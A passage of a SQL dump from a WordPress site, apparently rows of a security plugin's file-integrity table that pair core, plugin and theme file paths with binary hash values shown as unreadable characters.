]�4:@���<1}8','�#�eb[Q�|�hd��4=�!�5F��ʗ','',0,'?'),('c��E�cc�/2��F','wp-content/plugins/wp-cerber/assets/flags/ba.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S߫��ܟ�]�A;\Z���','\Z2��u2S��9{��Ө�G�D�+�����1�','',0,'?'),('c�Q��i�����Qv','wp-includes/css/dist/editor/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S����€_lRUr','�z94���d�¼��[m�€g�A�V�5�D�','',0,'?'),('c��k���AH�dryyK','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-pt_BR.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4<�j�B?7tKV��l','Ñ�X��t�)�{%W�╨�p�%��`͎q%�','',0,'?'),('c�׭�z8��5Y���','wp-content/plugins/wp-cerber/assets/flags/pr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����M�_6�p�tz','n��S�X��\Z�h�m2��9��q���\Z�Z','',0,'?'),('c�c������gu���','wp-content/plugins/wordfence/vendor/geoip2/geoip2/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';��8e_�T��ƽW','ݬ�IS�P\"�a�� 7J�6�QSv���_��y�','',0,'?'),('c��[b]��ݽ�JF','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I]�U��	X�g����','�T�Ϛ-�1 [�@./i󒶦�i��q��0�o','',0,'?'),('d��:w���O�І','wp-includes/ID3/getid3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!N\0�[�5�իk@0','B�#����L�fW������>2�nT����','',0,'?'),('d��1�쵓-�;O��','wp-admin/js/custom-background.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��P�A3�� K�}Û�$','4hN\n��:Q�qX�z!���iq�^sYĄ�,i�','',0,'?'),('d������Ժn�����','wp-content/themes/newsmagbd/vendors/magnific-popup/magnific-popup.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ҭ�P�X��A�1��','�W�A�)%p��#�N���\'�y���R�Oֶ','',0,'?'),('d�k�JQAw6im<B1','wp-content/plugins/wordfence/modules/login-security/wordfence-login-security.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B�Z�vϰ�^��s��#','��)�@��ƍ�|�+�T�к�j�^!9�/QS','',0,'?'),('d���Auh��041�','wp-includes/blocks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t����a=흕l0��-','�M*�4q�ɀ�l�?>`���SU��Ǭ��[T]�','',0,'?'),('d�K�/��\\�F��>7�','wp-content/plugins/redirection/locale/redirection-hr.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Sr����]���S�','�����yWp��A�\r����/M���ù`�CVi��','',0,'?'),('d�g�!č�F���\\�mB','wp-content/plugins/wp-cerber/assets/fonts/cerber.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T�TϦ)��fH@^','����V�r:z��/*��I��vG��g�X','',0,'?'),('d�0�ٷ\Z�����Ԍn','wp-content/plugins/wordfence/views/scanner/issue-wafStatus.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0<N5Җo���uM','p�\"\r���<��P13�r��z���=����Ɠ]','',0,'?'),('d�(��%J��@�G�','wp-admin/options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�AX��������\r�','�=3wQ�=��n	.A7�*�>VՈ��q�','',0,'?'),('dߚd��m��#���','wp-content/plugins/wordfence/css/jquery-ui-timepicker-addon.1629122067.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')e��f�#�`P�~7�n','-m��z��n�N�F�E\0ѭ\\vq�sL?�Z\Z��','',0,'?'),('d��1T�g�b���!','wp-includes/blocks/query-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q0<�\0�~���3�!��','��l�╼ @�^��5�Y�)X�\04drG�<','',0,'?'),('d�hħ{q4�2�K\"�','wp-includes/SimplePie/Rating.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�jkB�-\r?Q3Qw�U7','{nH�(>}Q(����a�����b�>��\n�FY+','',0,'?'),('d�4�j�2U�V��$�P','wp-admin/css/wp-admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7#Q�&M?»��|�[','Q�D���6���hP���qqM9�F�O��\\O�','',0,'?'),('d�@!��d�J���','wp-includes/js/mediaelement/mejs-controls.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.۷Z#e0�<�l���','�X�*��\Z��X�(�Z!�Ƚ��D2aB','',0,'?'),('e\0���h�L���щ��','wp-content/plugins/wordfence/lib/email_unsubscribeRequest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y���ѱƔUy��{�','pa����i��v��INa\'%��fE?�Mv��','',0,'?'),('e\r��Zf���ޞ��|�','wp-includes/js/api-request.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��k#�(�ĩ����','\\���Q�M�`�$�ڣg�E�\0|�Pne�r]','',0,'?'),('e���Xnj.\\�(&�d','wp-content/plugins/wordfence/views/scanner/issue-coreUnknown.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','推c�@g����h','ɿT���>�E�fg����K���� r��)�','',0,'?'),('e�P�f��o!�J�%','wp-content/plugins/wp-cerber/assets/flags/yt.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��FE=�W��=�\'���','-�*U��	�K-:��햴�O��ա�3','',0,'?'),('e.PȴNB�Sx[�&��','wp-admin/includes/class-wp-plugin-install-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a�T�+#}�B��^Z','���4I(q�����[�S:B�A8;�f�kRV{�','',0,'?'),('e0�8��/�;t�','wp-includes/blocks/tag-cloud/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T�US�\n���H�\0 \Z�y','58��C�4;�U�{<@47EB~��G��EL�','',0,'?'),('ei��y��,:���T�)','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Country.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0�Q�#2Џ���R���','~G)�R���7i-�#��R 9H��ǫ� b','',0,'?'),('ep\r}�u_4������','wp-content/plugins/wordfence/views/scanner/issue-checkSpamIP.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Щ3�^7�DPk�@c_�l','e�����נc�1��0F��^�b��B�Q@Bu��','',0,'?'),('et��=L���K�q�','wp-content/plugins/redirection/locale/redirection-it_IT.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����~n�կ��^��','5��,��уV�����Ƽ��KR��V�y[XFv','',0,'?'),('euo���(���8?5','wp-includes/js/jquery/ui/menu.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��V7g����q�ʤ','O&����x�1�,m��Q�c��YE�#RG���','',0,'?'),('e}0wTnv_�g�~','wp-content/plugins/wordfence/views/scanner/options-group-basic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VE�gO�`#jV�4�C|','�s�c��	;���*r3$X����G8ͬRK�','',0,'?'),('e��lsUO|�R}ܝ�i','wp-includes/sodium_compat/src/Crypto32.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I\r}j�NJQX]m��','ɱ��䱃Fn����2c.n�M��ڣ� A���','',0,'?'),('e��__�%��x���','wp-includes/class-snoopy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[�PQ��I��P4!��','�+�	��uzR�W	QW�|��5��� j[;U|�','',0,'?'),('e�^#|ۍ�TЩ��z','wp-includes/Text/Diff/Engine/xdiff.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ֹ�b�t�X8�GX','�[<�0�ą��aD)tJ�h�(C�[uH}sҘi�','',0,'?'),('e�\'���7�\r������','wp-includes/blocks/group/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Pۧ�1&���\Zѭ	�','ϳ��\n9����L/Q�Qȹڢ�V��^�����','',0,'?'),('fH}��O=�\r���','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-ru_RU.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a�!��\'���8��','�{�R]����t.y&ڵ��W.�A��Q�����','',0,'?'),('f�z�l He��x�r�','wp-content/plugins/wp-cerber/assets/fonts/roboto/Roboto-Medium.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ދt1�FB�0�MOKQ>�','\\^/��d``�_�kf�ӑ�ހV�+��Y�D','',0,'?'),('fp������j�H�\'','wp-content/plugins/wordfence/views/blocking/blocking-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��D��a���G]:','^Ķ�U�O�95E�ֹ�~��z��qM�q�3@','',0,'?'),('f�u3\n�M\\�}6*0�','wp-includes/class-wp-customize-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-j�b�4k2�`�s@','s\'�=*�o�[�垙B����i1�c9C�8P3�.��','',0,'?'),('f�F�A��l��Up���','wp-includes/blocks/post-featured-image/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���M;�	��[���c�','ǭĔqyE��%l��\'W3�/�|ٗ2�nӐ�ϡ','',0,'?'),('f�霰f؟|h��U�L','wp-admin/includes/ms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��2�2�r����qh^','��H��\'t�r�\\\\ovV�ߖ�΂���RJVY��p','',0,'?'),('f��ŭ�8��;�slV','wp-admin/js/privacy-tools.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����e���o`Q[�.�','��_A6���}��K�\r9�@\rro���N�\Z�','',0,'?'),('f����B�D�Fr\r\r�','wp-includes/Requests/Transport/fsockopen.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���؃S�g\\\nGB�','���9�縙;�O[x`��*�8H�*r��.�P�','',0,'?'),('f����e��R�)�','wp-includes/SimplePie/Item.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-ߟ��	�8����1�V','��Q`�m{�Ҹ\n�ք=��R#�Q����\0K�','',0,'?'),('f�3��Y����T','wp-includes/js/jquery/ui/tabs.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�73�l��c�P���R','��{�fT�k��3Ub��	AxT�8?�чaݯ�','',0,'?'),('fֈ�����V�Թ)�9','wp-includes/theme-compat/embed-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m\'牉�TeD�]pCA','J�ϑ߷�`�š+,��jr�#eQ�䫖 ���','',0,'?'),('g\n��[�q��g-	i�','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-utility-ip-address.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?��O�߄_�D���','�`�YABO��k[���Ai�\"5\rg���','',0,'?'),('g�\0{��?���r��','wp-content/themes/newsmagbd/assets/images/846x450.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_(�Sl���J�uǾ','�k퓨 �!1M)� RǸ���5�����2a��','',0,'?'),('g#�,vM������:��','wp-includes/js/jquery/jquery.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m�R&�l�7NHÍK','��S��f���\0�����HR�E��0�i؛sf�','',0,'?'),('g+yr���q����D��/','wp-includes/vars.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Zm���f1q��˴','�nl\Z���h�1he�-�M��5�Nl��bd�Hpz�','',0,'?'),('g+���wJoG���{b','wp-includes/js/dist/vendor/wp-polyfill-formdata.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����hU4�Sm`�\Z�S*','�WV�����Rq��1Sx��-o5x� sn��\\��','',0,'?'),('gC1N(�q;3�)h','wp-content/plugins/wp-cerber/assets/flags/ez.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('gE\n���X�F)4\0y�\'','wp-content/plugins/wp-cerber/assets/flags/gt.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eQ�2�\Z>���^�','�\ndJj7ؖ�S��y�a�{���Sm�Բ','',0,'?'),('gQir��똿��/!��','wp-includes/rest-api/endpoints/class-wp-rest-search-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\\��:�}�\0��','�7�ٗBȜ�ѲG�C��En��u��l��!c��','',0,'?'),('grN8��N�SU�]g\rM�','wp-content/plugins/wordfence/js/admin.liveTraffic.1629122067.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڗU�_|�$>���7','wR�u�sXq��s�a�OFvQ�y�Ł#���','',0,'?'),('gv��\ZUO��������','wp-includes/blocks/html/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jf;BʼnH���_�d|','׌�_��x�F僿!!͍�ݔd�^uI|�t�','',0,'?'),('g|y_�o4\"��X�N���','wp-includes/images/smilies/mrgreen.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-5��^����J�j���','���M��g�$��+;��\0�5����H&\\E6%w','',0,'?'),('g�\Z���Ş��|q�(','wp-includes/sodium_compat/src/Core32/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����R�<�nI�<','�e}]T��Y(�u&\r��90+��a�DϮ�#��','',0,'?'),('g�$G\\��;�r���1X','wp-includes/images/wpicons.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dS��uq��V_���a�','���cZ_��?n�_��K��6��1�\\}r','',0,'?'),('g�K����N>J��4','wp-includes/blocks/freeform/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Q�D�����e�','-�N�š>ܒٽ����j�n/�h��gS1T','',0,'?'),('g�f�1�۶�y�;�_','wp-includes/class-wp-http-proxy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@U,�:��-<I�e��','U���缕�H�.c�Sd~�*��)�','',0,'?'),('g�s��)��m��%','wp-content/plugins/wordfence/views/waf/options-group-whitelisted.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`r�ll�3@ޠ!s','F+�RZς�eQ$ep�G%Ev�-�xE','',0,'?'),('g�]e��!^��(PK���','wp-content/plugins/wordfence/models/common/wfTab.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2�T�}�HW\'<}\\','Z¥|�s�S�8e��3�Eؗ�$����ܜ-h�','',0,'?'),('g��~)�~�s�ʞ��I','wp-admin/includes/class-language-pack-upgrader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6d�,�����8E�','�G�y��mT�8=�?�5� �5��y�.�','',0,'?'),('gӁ�\"}�H��,�d�','wp-includes/blocks/social-links/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n�fȈHkf�=]T\n�','�ܰ��`Ͼ�\"�F���q� ���4��T','',0,'?'),('g��]bR%� Z��E�','wp-includes/js/shortcode.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ad�\'w#6?��w�','�����Q� 9I��o��T-�79_!���`','',0,'?'),('g�Ed��1��D}����','wp-includes/js/jquery/ui/autocomplete.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�s(.=����ͪ�','�a�b��u�7���K\'2��V�š�=y��','',0,'?'),('hZ[���=���w�r�','wp-includes/sodium_compat/src/Core32/XSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\������:R/�+','�ɫ�������:���jN�mm����R���[','',0,'?'),('h\ZOhl��_��Lm/�','wp-includes/class-wp-customize-manager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~I�`,�J)�]�&','(ل�?k��[z�s!�utm���V��f�s-','',0,'?'),('h d��껅2��_�r','wp-includes/functions.wp-styles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�GQ\0���[��� �9','E�Z�H����Ruj�X{L��oy�X`	Y��鈨','',0,'?'),('h,�	��#=l��Ǖ ','wp-content/plugins/redirection/models/redirect/redirect-options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q��zU��<�a|_*l�','&�F���nn�6�]j��	�C;{\r&䮸�hE�e','',0,'?'),('h0X-�i����^�G`8','wp-includes/pluggable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�䌀��נּ�#���|�','�����a#�\r9�y����̸�P�f�C hE=D','',0,'?'),('h4���#3�`�-݈�\"�','wp-admin/profile.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0��,���g;ꙴ','�C��q��N,�`v�S��*���Z[�`���m�','',0,'?'),('h@Z�%�R�F�;ti\\m','wp-admin/css/login-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6]\'�l�*!4���','ml�@嫿��s�`gwd,X,մf�/ᢩ!���(','',0,'?'),('hc���=� ���0�','wp-includes/block-patterns/social-links-shared-background-color.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����}��;`\Z�Դ��','>�**��?�-T*��H�%9�/��E�Vy�f�','',0,'?'),('h|hE��f:Ʊ2��~','wp-admin/network/theme-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','堷ȹ����H^r�','�f�kL��\Z�)h/F_��M�9�j���V�','',0,'?'),('h�OT,$��(�������','wp-includes/blocks/site-title/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_��ђ}�?IF7!�X�','}9\"ʓ���F)�����4�U�w^¹1^:���','',0,'?'),('h��~cTOo�y4|','wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f\"����#6${ JL\'\"','�eŇ�6\Z(�q�&�ڶ���]���\n�Cli�ީ�','',0,'?'),('h�M�V�m� ����','wp-includes/blocks/categories/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��=)�`K׮�!2:�7','����1���\'s�1I�M���Z�����մ$iD','',0,'?'),('h�<�]���OpNCƴ�','wp-content/plugins/wordfence/lib/wordfenceURLHoover.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�{�C-���.����','5%��꒛�⁚�d�*<nԗ�ҜN�Z��z�','',0,'?'),('h��]n,�����m:��','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-user-registration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	&�A�2+9\\[�','�g��C�}؞���gv���c��N��Q�py��','',0,'?'),('h�.α�D4$�Gv��lC','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-utility-htaccess.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'���sw~�O���','���I�D��v���j�Q߶��d;��t�\Z��¦','',0,'?'),('h���QK�V<r:Mg_��','wp-includes/js/dist/format-library.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V�Aۑo���/=ݠ�','��Y�F�L2\Z$����mEK�/8Ot��oh','',0,'?'),('i\n�x#d��zå8�','wp-content/plugins/wordfence/css/jquery-ui.theme.min.1629122067.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�K�0�b��xљ]','4����\n�c�E2=V�{�+�\\goЅ�O��','',0,'?'),('i����kmCx�ʷ��','wp-content/plugins/wordfence/lib/wfDashboard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e��.��q�:�j��R','u�a�v�R���+We\r�T�J%�\"�\r7�f���','',0,'?'),('i��;�&��o�?','wp-includes/IXR/class-IXR-base64.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*6���D�T�e��','?F]L�2}���\rS�@b�2�O�o�uU\'O��','',0,'?'),('i4�^v�zs�n�\Z�','wp-content/plugins/all-in-one-wp-security-and-firewall/images/feature-difficulty-badge-bg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rڦ�+޲`Ovh','�p_J�9��]3!\r\'?�Ja)�t1E_�������','',0,'?'),('ia{�-��\Z�ؙo��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}�<��܎�s��9','��Q�\'�r�� �t7��=s*a`<�z�o�_','',0,'?'),('idܶ�1�\"���^�','wp-includes/blocks/separator/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nS���Cg%�\nn��','��ች�^wx%8�a���!\'�b�m:�n#\r��','',0,'?'),('ii�\"o�C����`','wp-includes/sodium_compat/src/Core/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[Rz@�MMQmr���','�q���X9O���a4�A�����\'���̾e','',0,'?'),('itr�<\'����;�','wp-content/plugins/wp-cerber/languages/wp-cerber-vi.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0h�\0{.AS����D#�','xLn�O��A��f�\\��KM\rH�@�H����','',0,'?'),('i�X~�Ҟl�� )��','wp-content/plugins/wp-cerber/assets/fonts/cerber.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IW\n�a1�m-6>���','�a��{R�Ԉ���r��ɿ��=n�5�[�:bc','',0,'?'),('i��҄�uBn>��','wp-content/themes/newsmagbd/inc/customizer/core/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tF,�y��S9A���ӠY','dX��+n��6;!~�Kh��2D9,��m�\Zf','',0,'?'),('i�-��X�8V[~E�','wp-admin/css/install-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�j�$u��� ��ZX','���6[{\"��cG��o���bC�Z#Z���:','',0,'?'),('i�\\����=X�h$','wp-admin/js/language-chooser.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ӥ�ku��lLS�','��r4��i���j�\"܈�����6���&','',0,'?'),('i�k���C��T,�','wp-content/plugins/wordfence/lib/wfIPWhitelist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2�h��2aE��0','�D�:�]踝z����w%[�j�o����X`�','',0,'?'),('i�Թ/��s�(?�z','wp-content/plugins/wp-cerber/assets/flags/pl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�؍�J������S�$','�-v_ꉱ�N��M+o����	�cx��D]�','',0,'?'),('i�rHFn���A\n�AS�=','wp-content/plugins/wp-cerber/assets/select2/dist/css/select2.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T�AO���K��o�t�','�������lN_-�\n��|\r蒝vy�$k','',0,'?'),('j&�V1���6�4����','wp-content/plugins/wordfence/images/icons/ajaxWhite32x32.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���r��9 �#��{�','ᄆ��n�ѿ�0c~N��r��Au�g~Δ���I','',0,'?'),('j3]p���B���R!I�q','wp-content/plugins/wp-cerber/assets/flags/cr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v.\Zg����9V��','t~���� V�7�V���L�$D\0��p;\"�\ZX��1','',0,'?'),('j;���_�=�\Z����','wp-includes/blocks/group/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��!��6SHp1h}G*\'','�틞�0x��{���I�<�ߥ�C�B[xR�d�','',0,'?'),('jQ���e���;�e','wp-includes/css/wp-pointer-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���k�d�\\n�Ue�S@','������7�Z%\0L�|��I�`��?{hl�G�\\','',0,'?'),('jmE��AX�uw�>܆','wp-admin/css/colors/ectoplasm/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�꟬B1�R,:=�ȭ','�0�#��⼄��/��t)��Q�~f�\0s.B�','',0,'?'),('jt��Z��ܿ�,��','wp-content/plugins/wordfence/fonts/roboto-KFOkCnqEu92Fr1Mu51xIIzQXKMny.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r����a�a��i','{J�L���ͻ&��{��{��T:������B','',0,'?'),('j�䱋����%���]�','wp-includes/class-wp-xmlrpc-server.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7�`\'S���̽�','�I.��B�Ad<3KE�BB���Ya��F�KR~','',0,'?'),('j����p�\0Z��','wp-content/plugins/wordfence/modules/login-security/views/email/login-verification.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�Z�xu�t�\n��x�','��p!ŗ$�����<�#|j��f�#�-z�','',0,'?'),('j���)n�Q8ޮ�D�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�t0�,06���<��','�Q#f���9�;�8��*B�3�W�ao3Fc�','',0,'?'),('j����5F+���o','wp-includes/images/crystal/interactive.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R�m`��`�9��','$����멘<x1��Փ��IR�V-VZ\\jg.���','',0,'?'),('j��4-�O Մ��rL\n','wp-content/plugins/wordfence/models/block/wfRateLimit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��$1�D�\'w��m���','E&&\n��a���~�b+\Z���)j��M�p��M�','',0,'?'),('j�gs�66�$��8*�E�','wp-includes/class-wp-dependency.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���NV}��b.\'�5m','�[�4M�,�4�ܓ�x�wBB̕=Bg��}I�l�','',0,'?'),('j�d�CT[^�R���','wp-includes/block-patterns/query-large-title-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7�>��[�M���9�+�','}��%\Z@qt��D4�	�σ ����K�','',0,'?'),('k���$6O��-N�x�','wp-includes/js/tinymce/plugins/charmap/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=B�쟄��P\rL��','•�x[�G��-�90b.z�G��az�>�r','',0,'?'),('k%�\r0̯�IN6�D\'�y','wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�+�ک�d�ݬ@��','w�bj�Y����S����tc��� ��I��dQ','',0,'?'),('k6���*���H�	�u١','wp-content/plugins/wordfence/lib/dashboard/widget_notifications.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�,d\\	��Ta;�R','��7�#�}5V�\0\\��\ZO?v?����Aԍ','',0,'?'),('kE��n�fϋߟ�\'qb','wp-includes/blocks/video/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/cO��A���q��a','���xѭ�\Z�V�P��s�b�s҂�υ�l(A','',0,'?'),('kM������̙Ysp','wp-admin/credits.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N�B��ߑ��{W�1�','����T(ݥ��ЂU�u�w�	2� ��]�','',0,'?'),('km�|��Kma0�\"*�k','wp-admin/js/tags-suggest.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!�ͨ�p���d����','�r0�\"��l\n�E�ݴ�*�7��vL�{d','',0,'?'),('k}:����VN����G','wp-content/plugins/wordfence/vendor/composer/ca-bundle/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x>P��H�e6�[GF�5�','��q!�홐��%ހP٧��H��r�.�L��~','',0,'?'),('k��1���/�͓ݐ%=�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/MaxMind.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Dq�d6�+\"��U���','�I����s;֮����i����k���E�@�)','',0,'?'),('k��x\"�m�x?���dO','wp-content/plugins/redirection/database/schema/216.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0e\rI�Z�1�&�#�','�@���t�3\"�%z&7!(�S#k/@��-1��R�h','',0,'?'),('k��B˞�b=y��','wp-includes/user.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�֗��?�Z�Z���L�','j>�%��妫�%�)%�A��\n�F�s��l�wF{','',0,'?'),('k“��U/�^���� ','wp-content/plugins/wordfence/lib/rest-api/wfRESTAuthenticationController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z��֟0}_���','�O�+�WE��(\Zvl�%`���¢�x�6��n� ','',0,'?'),('kۚ��	